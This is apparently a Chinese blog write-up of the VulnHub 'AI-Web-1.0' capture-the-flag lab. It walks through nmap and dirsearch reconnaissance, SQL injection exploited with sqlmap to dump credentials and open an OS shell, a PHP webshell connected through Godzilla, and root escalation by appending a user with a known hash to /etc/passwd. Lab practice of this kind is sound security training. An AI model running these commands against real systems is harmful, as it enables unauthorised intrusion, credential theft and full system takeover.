AI-Web-1.0靶场

已于 2024-03-29 00:46:49 修改
阅读量1.1k 收藏 15
点赞数 18
文章标签: 网络安全 安全 web安全 系统安全
于 2024-03-27 14:59:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46187131/article/details/137077854
版权

准备阶段

下载地址

Download: https://drive.google.com/open?id=140bO4W6v7fd_dWhCmcFHTf86zwL9s_xP

Download (Mirror): https://download.vulnhub.com/aiweb/AI-Web-1.0.7z

网络设置

将网络设置为桥接模式

信息收集

端口扫描nmap

网络使用了NAT模式,先查看本机的VMware8(默认)虚拟网卡的网段

网段为192.168.52.1/24,使用nmap探测靶场网段

nmap -sn 192.168.52.1/24

-sn:禁用端口扫描

得知靶机IP为:192.168.52.130

接下来使用一些常规扫描

nmap -sV -O -sT 192.168.52.131

-sV:执行版本探测,尝试确定开放端口上运行的服务和版本信息

-O:开启操作系统探测,尝试推断目标主机运行的操作系统类型及其版本

-sT:执行TCP Connect扫描,这是最基本的扫描类型,通过建立完整的TCP连接来检测端口状态

nmap -sU 192.168.52.131

-sU:执行UDP扫描,用于探测开放的UDP端口

目录扫描dirsearch

对网站目录进行扫描

python37 dirsearch.py -u http://192.168.52.130/ -x 404

-x:排除指定状态码

指纹识别dismap

dismap-0.4-windows-amd64.exe -u http://192.168.52.130/

收集汇总

  1. 靶机为Linux系统,什么版本的目前不清楚
  2. 只开放了80端口,使用的Apache服务
  3. 敏感目录为robots.txt

渗透过程

访问网站和敏感文件目录

首先是默认的80端口

只有一句话,翻译:甚至不用谷歌搜索我的内容

http://192.168.52.130/

访问robots.txt文件

发现其他的敏感目录

http://192.168.52.130/robots.txt

m3diNf0目录

对网站的m3diNf0目录进行扫描
python37 dirsearch.py -u http://192.168.52.130/m3diNf0 -x 404

-x:排除指定状态码

phpinfo页面

发现网站根目录: /home/www/html/web1x443290o2sdf92213

se3reTdir777目录

发现一个搜索框

se3reTdir777/uploads/目录

SQL注入

判断是否存在

首先输入1,回显了账号密码

再输入1',此时发生了报错

使用burpsuite抓包,对其进行深入判断

此时我的TsojanScan插件判断出来了两种注入类型

报错注入

延时注入

手工判断后发现确实存在注入,注入点为uid

SQLmap一把梭-《梭哈是一种智慧》

将uid后面的参数改为*

SQLmap会自动识别

然后鼠标右键-->Copy to file-->添加文件名和后缀-->保存到桌面

将txt文件移动到SQLmap的目录下面

之前已经爆出了数据库名,现在直接获取所有内容

如果为移动文件夹,那么-r后面直接加入文件路径,比如:C:\Users\用户名\Desktop\1.txt

python37 sqlmap.py -r ./1.txt -D aiweb1 --dump

-r:指定文件

-D:数据库名

--dump:获取所有内容 注意:不推荐!!!因为这是靶机,所以才使用

看见等于号,立马判断是base64编码,进行解密后

RmFrZVVzZXJQYXNzdzByZA==;FakeUserPassw0rd

TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ==;MyEvilPass_f908sdaf9_sadfasf0sa

TjB0VGhpczBuZUFsczA=;N0tThis0neAls0

SQLmap获取shell
python37 sqlmap.py -r ./1.txt --os-shell

--os-shell:获取对网站进行shell获取

将网站和发现的根目录拼接起来,得到

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

访问http://192.168.52.130/se3reTdir777/uploads/tmpubgnv.php

上传php木马后,使用哥斯拉连接

提权

openssl提权

首先查whoami,并不是root权限

查看/etc/passwd文件,看看有那些权限

使用openssl添加用户

openssl passwd -1 -salt h 123456

添加用户h密码为123456

将用户写入/etc/passwd文件里

echo 'h:$1$h$DcmWd6ffV7pl4.0.1QBQ40:0:0:root:/root:/bin/bash'>>/etc/passwd

查看/etc/passwd文件,是否有写入进去

成功写入

cat /etc/passwd

切换h用户

su h

输入密码后whoami,显示为root,完成提权

查看flag

cat /root/flag.txt

总结

  1. 确认靶机IP
  2. 端口和目录扫描
  3. 使用SQLmap进行注入获取shell
  4. 使用openssl提权
喝水太累
关注
  • 18
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
HCIP-AI-MindSpore Developer V1.0.zip
05-09
AI认证试题样例分析 HCIP-AI-MindSpore Developer V1.0 版本说明 HCIP-AI-MindSpore Developer V1.0 实验手册 HCIP-AI-MindSpore Developer V1.0 学习文档 HCIP-AI-MindSpore Developer V1.0实验环境搭建及恢复指南
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 3961
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
记录一次vulnhub:AI-WEB-1.0靶场复现
sszsNo1的博客
06-24 181
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
HCIP-AI-Ascend Developer V1.0.zip
05-09
AI认证试题样例分析 HCIP-AI-Ascend Developer V1.0 版本说明 HCIP-AI-Ascend Developer V1.0 文档 HCIP-AI-Ascend Developer V1.0 学习资料 HCIP-AI-Ascend+Developer+V1.0+实验手册
HCIP-AI-Ascend Developer V1.0视频.zip
04-16
1.2.1 昇腾AI处理器架构(1) 1.2 昇腾AI处理器架构 1.2.2 昇腾AI处理器架构(2) 1.2 昇腾AI处理器架构 1.3.1 openGauss技术指标 1.3 openGauss技术指标 1.3.1 昇腾AI计算平台CANN 1.3 昇腾AI计算平台CANN ...
华为HCIP-AI-MindSpore Developer V1.0.rar
11-15
华为HCIP-AI-MindSpore Developer V1.0培训手册和实验指导书
HCIP-AI-Ascend Developer V1.0培训文档和实验手册.rar
03-31
HCIP-AI-Ascend Developer V1.0培训文档和实验手册
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8177
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
全视通智慧手术室对讲方案,让手术更安全更高效
2301_78035670的博客
04-24 447
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 819
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 323
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 258
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
什么是XXE攻击?如何进行防护
HoewDec的博客
04-19 1362
SSRF形成的原因是服务端提供了从其他服务器应用获取数据的功能,在用户可控的情况下,未对目标地址进行过滤与限制,导致此漏洞的产生。SSRF在攻击中扮演了中间者的角色,有时候直接攻击无法成效,通过SSRF可以利用其他主机的漏洞,攻击目标。安全性很难做到正确,即使在当今具有安全意识的世界中,也存在一些严重的漏洞,例如 XML 外部实体 (XXE),它们被忽视并最终成为破坏的原因。攻击者通常在XML文档中嵌入恶意的外部实体引用,当XML解析器处理这些文档时,会触发对外部资源的访问,进而执行攻击者指定的恶意操作。
4.3 海思SS928开发 - uboot开发 - 非安全启动镜像制作
luohaha66的博客
04-23 240
上电,启动GSL,启动uboot,引导内核启动。
无需公网IP,安全稳定实现U8C异地访问
asdaddsd的博客
04-21 274
快解析内网穿透实现在任何地域、任何时间、任何网络环境,快速访问内网的各种应用。为了进一步保证企业访问的安全性,快解析域名不仅支持https协议、免开端口,同时在无忧版、钻石版、旗舰版、星耀版增加了访问白名单、访问密码功能,让企业数据更安全。快解析内网穿透经常运用在远程办公OA、数据库、搭建web网站、ERP、访问NAS、信息管理、文件共享FTP、软件跨网互通等各种场景。在财务、人力、供应链、采购、制造、营销、研发、项目、资产、协同等领域为客户提供数字化、智能化、社会化的企业云服务产品与解决方案。
Windows 安全中心:页面不可用 你的 IT 管理员已限制对此应用的某些区域的访问,并且你尝试访问的项目不可用。有关详细信息,请与 IT 支持人员联系。
u013669912的博客
04-22 564
Windows 安全中心提示:【页面不可用 你的 IT 管理员已限制对此应用的某些区域的访问,并且你尝试访问的项目不可用。有关详细信息,请与 IT 支持人员联系。】 Windows 11 重置后,无法打开 windows 安全中心,或打开安全中心背景是白色
速卖通自养号测评:如何规避安全风险?
2301_79301920的博客
04-24 342
目前,我们的自养号成功率已经能够达到九成以上,每个账号都实现了独立IP、独立环境、独立防火墙的配置,避免了砍单、封号等风险,同时确保了账号之间无任何关联。当前市场上,真人测评账号质量参差不齐,找到合适的买家进行测评并不容易,而且恶意差评的问题也时有发生,因此不建议作为主要测评手段。然而,值得注意的是,测评并非一蹴而就的短期行为,而是一个需要精心策划、持续进行的过程。由于速卖通新店铺往往难以获得平台活动的支持,流量也相对匮乏,因此,开店的首要任务便是进行测评,通过积累一定的评论和销售数据。
基础安全:CSRF攻击原理与防范
八尺妖剑的博客
04-23 1286
这是一种常见的网络攻击手段,攻击者通过构造恶意请求,诱骗已登录的合法用户在不知情的情况下执行非本意的操作。这种攻击方式利用了Web应用程序中用户身份验证的漏洞,即浏览器在用户完成登录后会自动携带相关的认证信息(如Cookie、Authorization header等)发送给服务器,使得服务器误以为请求来自已授权的用户。这是一个阳光明媚的好日子,万里无云,心情愉悦,用户哼着小曲儿兴高采烈的通过下面的请求地址登录了自己的账户并给小老婆转账520000,成功登录后在浏览器上留下了。基于上面的概念描述,
hcia-intelligent computing v1.0 实验手册
01-17
hcia-intelligent computing v1.0 实验手册是华为公司针对人工智能计算领域的培训教材。该手册主要包括人工智能基础知识、数据处理、模型训练与部署等内容,旨在帮助学习者了解人工智能的基本概念和技术,并掌握相关...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值